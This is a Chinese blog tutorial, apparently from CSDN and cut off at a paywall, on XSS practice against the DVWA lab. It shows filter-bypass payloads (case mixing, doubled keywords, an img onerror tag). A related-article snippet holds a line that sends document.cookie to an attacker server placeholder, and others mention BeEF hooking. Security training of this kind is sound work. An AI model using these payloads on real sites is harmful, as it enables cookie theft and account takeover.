Web漏洞_XSS(cookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)

最新推荐文章于 2024-09-27 23:54:06 发布
最新推荐文章于 2024-09-27 23:54:06 发布
阅读量1.7k 收藏 14
点赞数 2
分类专栏: Web漏洞 文章标签: XSS DVWA XSS利用 XSS反射型 XSS存储型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BeatRex/article/details/88671530
版权

Cookie与session

  • 有状态会话与无状态会话:
    当我们登陆网站的时候,会输入用户名及密码等信息。
    当在无状态会话场景时,我们每次打开此网站均需要输入信息进行验证。
    有状态会话场景时,当第一次验证通过后,服务器会在http响应包中发送一个此用户唯一的信息(cookie)便于下次登陆无需再次验证。

  • Cookie: Cookie按照存储的位置可以分为:硬盘Cookie和内存Cookie
    硬盘Cookie:Cookie信息存储在客户端的硬盘中,由服务器设置过期时间。除非由用户清理或者过期否则硬盘Cookie不会被清除。
    内存Cookie:Cookie信息存储在客户端内存中,随着浏览器关闭后就会消失。

  • session:
    session与cookie的作用相同,也是用于服务器验证用户。不同的是,session信息存储在服务器,当用户打开网站到关闭网站即为一个session。浏览器关闭后,session也将注销。
    服务器通过SESSIONID来识别不同的用户,SESSIONID可以包含在http响应中的cookie的值中。

  • Cookie和session的区别就是存储的位置,Cookie存储在客户端;session存储在服务器,客户端仅存储一个SESSIONID

一、原理

由于后台程序对输入框的内容过滤不完善导致后台程序将用户输入恶意的JavaScript代码返回给浏览器,浏览器执行。

二、分类

  • 反射型XSS
    反射型XSS即只有用户点击连接后触发
  • 存储型XSS
    黑客构造好XSS代码并将这些恶意代码填到留言板等地方并发表,这些恶意代码存储到后台数据库中,所有访问留言板的用户均会受到攻击。
  • DOM型XSS

三、绕过

  1. 注意标签的闭合
    当构造的代码在<title>,<textarea>等标签中时,需要考虑将这些标签闭合然后再将构造的代码加在后边。在div标签中可以不用闭合。

  2. 大小写绕过
    有些使用了一些函数过滤script关键字,可以考虑ScriPt等随意改变只要与script不同即可

  3. 双写绕过
    有些过滤看到script会将其删除可以进行双写,如scRiscriptpt进行绕过

  4. 图片标签加事件绕过

在这里插入图片描述

<img src=# onerror=alert('xss')>)

在这里插入图片描述

四、漏洞利用

  • 修改网页内容
  • 盗取cookie
  • XSS蠕虫
  • 网站挂马
  • 重定向

五、DVWA、XSS反射型

Low级别

直接输入<script>alert('xss');</script>进行测试
在这里插入图片描述

medium级别

依旧输入之前的测试代码进行测试,发现将script标签过滤
在这里插入图片描述
尝试大小写绕过<scripT>alert("xss");</sCript>

在这里插入图片描述
尝试双写绕过<sc<sc

最低0.47元/天 解锁文章
BeatRex
关注
专栏目录
反射xss漏洞DVWA靶场)
qq_37834406的博客
02-10 1117
环境 靶机dvwa 测试工具:BurpSuit,HackBar, Netcat XSS 漏洞产生的原因,和 SQL 注入有“异曲同工之妙”,所以 XSS 又称作“ HTML 注入”,都是没有对用户输入的内容,进行检查过滤而导致站点被恶意利用,或者服务器数据被窃取,那么如何发现 XSS 漏洞的存在呢?
Dvwa靶机渗透教程-xss反射漏洞
imhacket0day的博客
08-25 1201
Dvwa靶机渗透教程-xss反射漏洞 简单: emmm…很明显…这里用'><script>alert(1)</script>试试 好的,确认有漏洞;接下来讲利用 '<script>window.location.href='http://服务器地址/?cookie='+document.cookie</script> 用这个获取受害者cookie并发回服务器 使用python2搭建简单web服务器: python2 -m SimpleHTTPServ
xsscookie窃取
weixin_30911809的博客
03-07 597
一、窃取cookie有什么用? cookie相当于一个身份证 有了管理员的cookie我们不需要帐号密码就可以登陆 二、反射xss有存贮xss什么区别? 反射 xss和服务器没有交互 只能用一次 储存 xss和服务器有交互 可以反复使用 危害较大 三、本次教程用到的工具 1.phpstudy(PHP调试环境的程序集成包) 2.dv...
XSS(内含DVWA
最新发布
m0_73902453的博客
09-27 935
反射 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
【安全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 524
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
BeEF结合存储XSS利用
Zlirving_的博客
06-02 908
XSS就不过多介绍或阐述了 实验原理 BeEF是一种专注于Web浏览器的渗透测试工具。 BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。BeEF超越了强化的网络边界和客户端系统,并在一个敞开的大门环境中检查可利用性:Web浏览器。 BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击。   实验场景 这里的攻击网络一般是指攻击内网。想象一下这样的场景:当一个公司内部网络的浏览器被BeEF勾住了,那么可不可以使用它来攻击这
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4787
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
DVWAXSS跨站脚本攻击
sunshine1_0的博客
04-17 697
XSS跨站脚本攻击
渗透测试实验3:XSS和SQL注入
ColdMoon_Rain的博客
12-14 533
实验准备 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验 XSS 实验环境搭建 实验具体步骤我参考了以下文章:https://b
XSS和SQL注入
suzyrose
12-16 584
实验XSS和SQL注入 说明:套用实验报告模板,红色部分无需复制到报告。 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验
day07beef-xss之根据beef-xss获取cookies
guowu666的博客
05-02 417
若报错运行不了尝试。
XSS获取cookie利用方式 (ASP版).txt
12-22
XSS获取cookie利用方式简单方法
XSS自动化工具——Beef
世间繁华梦一出
03-10 5620
Beef使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
XSS 工具之 beef
weixin_47306547的博客
09-25 798
beef介绍 XSS 漏洞利用平台,kali 自带 beef 的启动 Kali 中 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 工具的方法 1)beef-xss 2) /usr/share/beef-xss/beef 注:在启动前需要修改默认用户...
利用XSS漏洞cookie
qq_68163788的博客
01-15 2109
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
XSS利器之BeEF
weixin_32643811的博客
07-08 55
BeEF安装beefsudo apt install beefsudo beef -xss设置密码在上述页面中,给我们提供了两条信息,一条是BEEFXSS引用地址,即本地IP3000端口下的hook.js;另一条是BEEF的管理页面,即本地地址/ui/panel。我们此时可以看到在当前Kali Linux已经开始监听30...
DVWA靶场+BEEFxss平台复现XSS脚本攻击(获取cookie,跳转指定网页)
weixin_73180072的博客
09-18 597
1.kali搭建安装好beef2.win10搭建好dvwa靶场。
xss--钓鱼(beef
qq_51802152的博客
10-26 217
kali---beef 牛肉的使用
Beefxss使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
DVWA教程:深度解析XSS攻击的反射存储
DVWA(Damn Vulnerable Web Application)是一种开源的Web应用程序,专门设计用来作为学习和教学工具,用于演示和教授各种Web安全漏洞,其中就包括跨站脚本(XSS)攻击。XSS是一种常见的Web安全问题,攻击者通过在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值